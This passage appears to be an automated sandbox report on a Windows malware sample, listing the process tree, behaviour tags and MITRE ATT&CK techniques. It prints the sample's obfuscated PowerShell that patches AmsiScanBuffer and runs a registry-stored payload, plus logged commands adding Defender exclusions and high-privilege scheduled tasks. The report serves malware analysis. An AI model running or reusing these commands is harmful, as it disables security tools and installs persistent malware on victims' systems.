Reflection.AssemblyName(''+'R'+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+'e'+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'el'+'e'+''+[Char](103)+'at'+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+',Pub'+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+'Ans'+'i'+''+'C'+'las'+[Char](115)+','+[Char](65)+''+'u'+'to'+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$qXksweqzRwM.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+'id'+'e'+'B'+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$CofLyMqMdsgoFI).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+',Man'+[Char](97)+''+'g'+''+'e'+''+'d'+'');$qXksweqzRwM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+'c'+''+','+'Hid'+'e'+''+[Char](66)+''+'y'+'S'+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+'l',$WLktYNWdvy,$CofLyMqMdsgoFI).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $qXksweqzRwM.CreateType();}$ldCoZlNiHedJv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'tem'+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+'M'+''+'i'+'cr'+[Char](111)+''+'s'+'o'+[Char](102)+'t'+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+'3'+''+'2'+'.U'+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+'th'+[Char](111)+'d'+[Char](115)+'');$MLDkvhWLBHdWsR=$ldCoZlNiHedJv.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+'d'+''+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'ti'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$huHavpRrIQjpmNhIqBs=DkvrtYzMINMC @([String])([IntPtr]);$yVlwQSqBSRsdECWQEdAVcQ=DkvrtYzMINMC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ynJZzkflQPe=$ldCoZlNiHedJv.GetMethod('G'+'e'+'t'+[Char](77)+''+'o'+''+[Char](100)+'ul'+[Char](101)+''+'H'+''+'a'+'ndl'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'nel3'+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$XiRCvkVWzvwGhn=$MLDkvhWLBHdWsR.Invoke($Null,@([Object]$ynJZzkflQPe,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+'a'+'r'+''+[Char](121)+''+'A'+'')));$SHagYkbMlGciWpBLB=$MLDkvhWLBHdWsR.Invoke($Null,@([Object]$ynJZzkflQPe,[Object](''+'V'+'i'+[Char](114)+''+'t'+''+[Char](117)+'al'+'P'+''+[Char](114)+'ot'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$IeJQJWs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XiRCvkVWzvwGhn,$huHavpRrIQjpmNhIqBs).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+'i.dl'+'l'+'');$JllDsCdyNUFVDEUNm=$MLDkvhWLBHdWsR.Invoke($Null,@([Object]$IeJQJWs,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+'S'+'c'+[Char](97)+''+[Char](110)+''+'B'+'u'+'f'+'f'+'e'+''+[Char](114)+'')));$nZRFSAoSkO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SHagYkbMlGciWpBLB,$yVlwQSqBSRsdECWQEdAVcQ).Invoke($JllDsCdyNUFVDEUNm,[uint32]8,4,[ref]$nZRFSAoSkO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JllDsCdyNUFVDEUNm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SHagYkbMlGciWpBLB,$yVlwQSqBSRsdECWQEdAVcQ).Invoke($JllDsCdyNUFVDEUNm,[uint32]8,0x20,[ref]$nZRFSAoSkO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'w'+''+[Char](119)+'w'+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1336
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1572

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1820

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1408

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2224

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2800

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2980

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3288

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3428
- C:\Users\Admin\AppData\Local\Temp\ME77ZTVpfPe1.exe
  "C:\Users\Admin\AppData\Local\Temp\ME77ZTVpfPe1.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4408
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionExtension '.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4796
- - C:\Users\Admin\AppData\Local\Temp\Powershell.exe
    C:\Users\Admin\AppData\Local\Temp/Powershell.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:1052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\www.msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1832
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.msedge" /SC ONLOGON /TR "C:\Windows\Fonts\www.msedge.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3616
  - - C:\Windows\Fonts\www.msedge.exe
      "C:\Windows\Fonts\www.msedge.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      PID:452
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\www.msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3848
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.msedge.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3876
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4708
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2680
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2040
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.MsEgeServ.com'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3144
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3264
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "www.MsEgeServ" /tr "C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4528
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:484
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:400
  - - C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe
      "C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4808
    - - C:\Users\Admin\AppData\Local\Temp\REHQDPN.exe
        
        C:\Users\Admin\AppData\Local\Temp\REHQDPN.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:1692
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1fc7190a.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4056
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3560

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3976

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1136

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:5032

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1180

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:4828

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3472

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3624

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2056

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4004

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:3132

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Enumerates system info in registry
PID:4396

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:2880

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

System Information Discovery